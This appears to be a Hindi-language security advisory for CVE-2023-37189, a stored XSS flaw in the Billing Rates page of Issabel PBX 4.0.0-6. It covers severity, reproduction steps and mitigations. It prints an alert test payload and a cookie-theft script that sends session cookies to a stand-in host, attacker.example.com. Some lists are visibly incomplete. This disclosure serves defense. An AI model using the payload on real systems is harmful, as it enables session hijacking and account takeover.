
एक Stored Cross-Site Scripting (XSS) कमजोरी Issabel PBX संस्करण 4.0.0-6 में Billing Rates प्रबंधन पृष्ठ (index.php?menu=billing_rates) के अंदर मौजूद है।
| फ़ील्ड | विवरण |
|---|
| CVE ID | CVE-2023-37189 |
| भेद्यता | संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) |
| प्रभावित उत्पाद | Issabel PBX 4.0.0-6 |
| प्रभावित URL | index.php?menu=billing_rates |
| भेद्य फ़ील्ड | Create New Rate मॉड्यूल में Name और Prefix फ़ील्ड |
| गंभीरता | मध्यम (CVSS 3.1 आधार स्कोर: 6.1 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) |
| रिपोर्ट तिथि | 07 जुलाई 2023 |
| खोजकर्ता | Sahil Ojha |
| परीक्षण किया गया | Windows |
| विक्रेता होमपेज | https://www.issabel.org/ |
| सॉफ्टवेयर स्रोत | https://github.com/IssabelFoundation/issabelPBX |
Issabel PBX संस्करण 4.0.0-6 में बिलिंग दर प्रबंधन पृष्ठ (index.php?menu=billing_rates) पर एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है।
Issabel PBX FreePBX/Asterisk पर आधारित एक व्यापक रूप से उपयोग किया जाने वाला ओपन-सोर्स यूनिफाइड कम्युनिकेशंस प्लेटफॉर्म है। इसका Billing → Rates फीचर प्रशासकों को कस्टम Name और Prefix के साथ कॉल दर प्रविष्टियाँ परिभाषित करने की अनुमति देता है। अपर्याप्त इनपुट स्वच्छता और आउटपुट एन्कोडिंग के कारण, एक प्रमाणित हमलावर किसी भी फ़ील्ड में मनमाना HTML या JavaScript इंजेक्ट कर सकता है। दुर्भावनापूर्ण स्क्रिप्ट फिर एप्लिकेशन डेटाबेस में स्थायी रूप से संग्रहीत हो जाती है और बाद में किसी भी उपयोगकर्ता (अन्य प्रशासकों सहित) के ब्राउज़र में स्वचालित रूप से निष्पादित हो जाती है, जो बिना किसी अतिरिक्त इंटरैक्शन के Rates पृष्ठ पर जाता है।
प्रशासनिक पैनल में इस प्रकार की भेद्यता विशेष रूप से खतरनाक है क्योंकि:
Name और Prefix फ़ील्ड पर HTML एन्कोडिंग / आउटपुट स्वच्छता का अभाव।निम्नलिखित पेलोड, जब Create New Rate फॉर्म के Name या Prefix फ़ील्ड में दर्ज किए जाते हैं, भेद्यता प्रदर्शित करते हैं:
मूल चेतावनी (कार्यक्षमता जांच):
<script>alert('XSS')</script>
सत्र कुकी चोरी (attacker.example.com को अपने स्वामित्व वाले और उपयोग करने की अनुमति प्राप्त सर्वर से बदलें — वास्तविक उपयोगकर्ताओं या सिस्टम को कभी लक्षित न करें):
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>
छवि-आधारित onerror पेलोड (WAF बाईपास):
⚠️ नोट: ये पेलोड केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किए गए हैं। किसी भी ऐसे सिस्टम पर परीक्षण करने से पहले हमेशा उचित लिखित प्राधिकरण प्राप्त करें जो आपके स्वामित्व में नहीं है।
लॉग इन करें Issabel PBX वेब इंटरफ़ेस में एक प्रशासक खाते का उपयोग करके।
Reports → Billing → Rates पर जाएं (URL: index.php?menu=billing_rates).
"Create New Rate" पर क्लिक करें और Prefix या Name फ़ील्ड में एक तैयार XSS पेलोड दर्ज करें।

Save पर क्लिक करें। पेलोड अब डेटाबेस में संग्रहीत हो गया है।
कोई भी उपयोगकर्ता (अन्य प्रशासकों सहित) जो Billing Rates पृष्ठ पर जाता है, उसके ब्राउज़र में स्क्रिप्ट स्वचालित रूप से निष्पादित हो जाएगी।


विक्रेता और सिस्टम प्रशासकों को निम्नलिखित प्रतिउपाय लागू करने की सलाह दी जाती है:
ENT_QUOTES के साथ htmlspecialchars() का उपयोग करें)। यह XSS के विरुद्ध प्राथमिक और सबसे विश्वसनीय बचाव है।<, >, ", ', &) को स्ट्रिप या एन्कोड करें। ध्यान दें कि केवल इनपुट सत्यापन को बायपास किया जा सकता है और इसे एकमात्र नियंत्रण के रूप में भरोसा नहीं करना चाहिए।Content-Security-Policy HTTP हेडर तैनात करें।यह रिपॉजिटरी और इसमें निहित जानकारी केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान की गई है। लेखक प्रदान की गई जानकारी के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। कोई भी सुरक्षा परीक्षण करने से पहले हमेशा सिस्टम स्वामी से स्पष्ट लिखित अनुमति प्राप्त करें।
द्वारा खोजा और रिपोर्ट किया गया Sahil Ojha